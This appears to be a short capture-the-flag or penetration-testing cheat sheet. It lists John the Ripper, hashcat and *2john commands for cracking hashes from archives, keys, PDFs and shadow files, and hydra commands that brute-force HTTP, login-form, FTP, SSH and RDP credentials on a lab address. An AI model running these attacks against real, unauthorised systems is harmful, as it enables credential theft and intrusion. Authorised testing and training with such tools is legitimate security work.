john --wordlist=rockyou.txt hash.txt
zip2john file1.zip>hash.txt
rar2john file1.rar > hash.txt
gpg2john file1.priv > hash.txt
john --wordlist=rockyou.txt --format=sha512crypt unshadowed.txt
ssh2john id_rsa > hash.txt
john --wordlist=rockyou.txt hash.txt --format=NT
pdf2john file.pdf > hash.txt
hashcat -m 0 7d98afcbd8a6c5b8c2dfb07bcbe29d34 /root/rockyou.txt --force
hydra -l admin -P dict/rockyou.txt http://10.10.10.10/ [-s 443] http[s]-get /private/
hydra -l admin -P dict/rockyou.txt 10.10.10.10 [-s 443] http[s]-post-form Hash/Password Crack post-form "/login.php:username=admin&password=^PASS^&login=Login:F=Incorrect username or password" -V
hydra -t 1 -l admin -P dict/rockyou.txt -vV 10.10.10.10 ftp
hydra -l user -P dict/rockyou.txt ssh://10.10.10.10:22 -t 4
hydra -t 1 -V -f -l administrator -P dict/rockyou.txt rdp://10.10.10.10